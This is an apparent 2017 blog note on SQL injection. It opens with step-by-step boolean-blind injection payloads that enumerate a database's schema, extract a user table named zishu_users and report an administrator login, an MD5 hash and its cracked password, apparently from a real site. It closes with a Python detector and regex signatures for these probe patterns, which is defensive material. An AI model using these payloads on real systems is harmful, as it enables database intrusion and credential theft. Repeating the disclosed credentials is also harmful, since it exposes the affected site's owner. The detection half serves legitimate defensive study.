@leptune 2017-02-24T07:10:50.000000Z Words: 1254 Views: 252

SQL injection

Tag: Technology


```sql
%20and exists (SELECT 1 FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and table_name like '%users%') -- the user table's name contains "users"
%20and (SELECT count(*) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and table_name like '%users%')=1 -- only one table name contains "users"
-- Binary-search the range 1..127 for the character's ASCII value; it comes out as 122, i.e. 'z'. Keep going the same way for each position until even "> 0" returns false, which means the end of the name has been reached.
%20and exists (SELECT 1 FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and table_name like '%users%' and ascii(substr(table_name,1,1)) > 90)
-- Repeat the previous step with substr(table_name,1,1) replaced by substr(table_name,2,1), and so on; the user table turns out to be named zishu_users

%20and exists (select 1 from information_schema.COLUMNS where table_schema=database() and table_name='zishu_users' and column_name='username') -- there is a username column
%20and exists (select 1 from information_schema.COLUMNS where table_schema=database() and table_name='zishu_users' and column_name like '%password%') -- there is a column whose name contains "password"
%20and exists (select 1 from information_schema.COLUMNS where table_schema=database() and table_name='zishu_users' and column_name like '%password%' and ascii(substr(column_name,1,1)) > 90) -- binary search gives the column name userpassword
%20and ascii(substring((SELECT concat(username,0x3a,userpassword) from zishu_users limit 0,1),1,1))>90 -- binary-search the username and password of the first row of the user table
-- Result: administrator:5a3f3486f014252b17c3b6b97fdcf482; reversing the MD5 gives 082188
```

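As an added example, not part of the original note: a small Python detector that scans web access-log lines for the boolean-blind probe patterns used above (INFORMATION_SCHEMA enumeration, ascii(substr()) character oracles, boolean "and exists (" tails, and the "limit 0,1" row walk). The log lines, client IP and combined-log format are constructed samples, not real traffic.

```python
"""Flag boolean-blind SQL injection probes (as in this note) in access-log lines."""
import re
from urllib.parse import unquote_plus

# One regex per technique the walkthrough relies on; applied to the
# URL-decoded, lower-cased query string of each request.
SIGNATURES = {
    "schema_enum": re.compile(r"information_schema\.(tables|columns)"),
    "char_oracle": re.compile(r"ascii\s*\(\s*substr(ing)?\s*\("),
    "bool_tail":   re.compile(r"\band\s+(exists\s*\(|\(\s*select\b)"),
    "row_walk":    re.compile(r"\blimit\s+\d+\s*,\s*1\b"),
}

# Minimal parser for an Apache/nginx combined-log style line (assumed format).
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP/')

# Constructed sample log: one benign request, then two probes built from the
# payloads in this note (spaces URL-encoded as %20, as in the original).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Feb/2017:07:10:50 +0000] "GET /item?id=42 HTTP/1.1" 200 512',
    '203.0.113.5 - - [24/Feb/2017:07:10:51 +0000] "GET /item?id=42%20and%20exists%20'
    '(SELECT%201%20FROM%20INFORMATION_SCHEMA.TABLES%20where%20TABLE_SCHEMA=database()'
    '%20and%20table_name%20like%20\'%users%\'%20and%20ascii(substr(table_name,1,1))%20>%2090)'
    ' HTTP/1.1" 200 512',
    '203.0.113.5 - - [24/Feb/2017:07:10:52 +0000] "GET /item?id=42%20and%20ascii(substring('
    '(SELECT%20concat(username,0x3a,userpassword)%20from%20zishu_users%20limit%200,1),1,1))>90'
    ' HTTP/1.1" 200 512',
]

def normalize(raw_query: str) -> str:
    """URL-decode twice (to undo double encoding) and fold case."""
    return unquote_plus(unquote_plus(raw_query)).lower()

def classify(raw_query: str) -> list[str]:
    """Return the names of every signature the query string trips."""
    text = normalize(raw_query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (client_ip, signature_names) for each request that looks like a probe."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        query = m.group("path").partition("?")[2]  # part after '?', '' if none
        hits = classify(query)
        if hits:
            findings.append((m.group("ip"), hits))
    return findings
```

Alerting on a single client that trips `char_oracle` hundreds of times in a few seconds is the practical signal: the binary search above needs roughly seven requests per extracted character.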